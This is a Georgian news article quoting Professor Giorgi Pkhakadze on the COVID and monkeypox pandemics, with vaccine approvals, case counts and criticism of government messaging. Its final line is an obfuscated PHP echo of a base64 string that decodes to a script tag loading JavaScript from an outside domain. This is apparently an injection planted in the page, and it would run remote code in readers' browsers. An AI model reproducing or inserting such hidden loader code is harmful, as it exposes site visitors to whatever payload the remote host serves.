celsiusi
ავერსი საქკაბელი
“აკრედიტაცია საზღვრების გარეშე” პრეზიდენტის, პროფესორის გიორგი ფხაკაძის განცხადებით, ამჟამად მსოფლიოს ორი პანდემია უტევს, კოვიდის და მაიმუნის ყვავილის და საჭიროა მოვემზადოთ, არ ვიპანიკოთ და ამ პანდემიებს ცივი გონებით ვებრძოლოთ. 
  
მისივე თქმით, მაიმუნის ყვავილის წინააღმდეგ გუშინ ევროკავშირის წამლის სააგენტომ დაამტკიცა ყვავილის ვაქცინა, რომელიც არის დამზადებული დანიური ბიოტექნოლოგიური კომპანიის “ბავარიან ნორდიკ-ის” (Bavarian Nordic) მიერ, როგორც მაიმუნის ყვავილის საწინააღმდეგო პრევენციული ვაქცინა. ეს ვაქცინა უკვე არის ოფიციალურად აღიარებული ამერიკაში და კანადაში, როგირც მაიმუნის ყვავილის პრევენციული ვაქცინა. 
 
ფხაკაძე საზოგადოებას რამდენიმე რჩევას აძლევს, თუ როგორ უნდა ვებრძოლოთ დაავადებებს:
 
"მაიმუნის ყვავილის პანდემია დაიწყო და ეს არის ფაქტი. ამჟამად მსოფლიოს ორი პანდემია უტევს, კოვიდის და მაიმუნის ყვავილის და საჭიროა მოვემზადოთ, არ ვიპანიკოთ და ამ პანდემიებს ცივი გონებით ვებრძოლოთ.
 
ორივე პანდემიის წინააღმდეგ დღეს გვაქვს იარაღი:
 
1. ცოდნა ამ პანდემიების შესახებ.
2. სათანადო შეიარაღება, როგორიცაა:  ვაქცინები, პირბადეები, დისტანცია, ხელების დაბანა და ასე შემდეგ. და ასევე წამლების საკმაოდ დიდი არჩევანი და ექიმების გამოცდილება. 
3.მოსახლეობის და სამედიცინო სისტემის მობილიზება/ინფორმირება.
4.არავითარი პანიკა. 
 
ყველაფერი კარგად იქნება, თუ ამ პანდემიებს ცივი გინებით და შესაბამისად შეიარაღებულები შევხვდებით. 
 
რაც შეეხება მაიმუნის ყვავილს. ამ ეტაპზე მსოფლიო ლიდერი არის ამერიკის შეერთებული შტატები - 3846 ინფიცირებული, შემდეგ მოდის ესპანეთი - 3125, მე-3 ადგილას კი გერმანია - 2352 ინფიცირებული. საფრანგეთში 1700 ადამისნი დაინფიცირდა მაიმუნის ყვავილით! ზოგ ქვეყანაში ზრდა ერთ ქვირაში იყო 20-30% და ამერიკაში 3 დღეში 33%!
 
მაიმუნის ყვავილის ვირუსმა არ იცის ასაკი, სქესი, და სულ არ აინტერესებს, რომელი პოლიტიკური პარტიის მომხრე ხართ! ეს ვირუსი უკვე საქართველოშია!
საქართველოს სახელმწიფო ამჟამად აქტიურად უნდა მუშაობდეს, რომ შეიძინოს ზემოაღნიშნული ვაქცინის სათანადო რაოდენობა. 
 
სახელმწიფომ თავი უნდა დაანებოს “კომუნისტური” მეთოდებით პანდემიებთან ბრძოლას და პრობლემებს თვალებში შეხედოს.
 
უაზრობაა ტყუილების გაჟღერება, რომ “საქართველოში სეზონური გრიპია”, როცა გაქანებული კივიდის აფეთქებაა ქვეყანაში და “მაიმუნის ყვავილი საქართველოში არ იქნება”, როცა მსოფლიოს 80-მდე ქვეყანას მოედო და საქართველო რა, მთვარეზეა?! ასეთი ტყუილები დამღუპველია!
 
ვთქვათ სიმართლე! შევხვდეთ პანდემიებს შეიარაღებულნი!"–ამბობს გიორგი ფხაკაძე. 
 
702
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");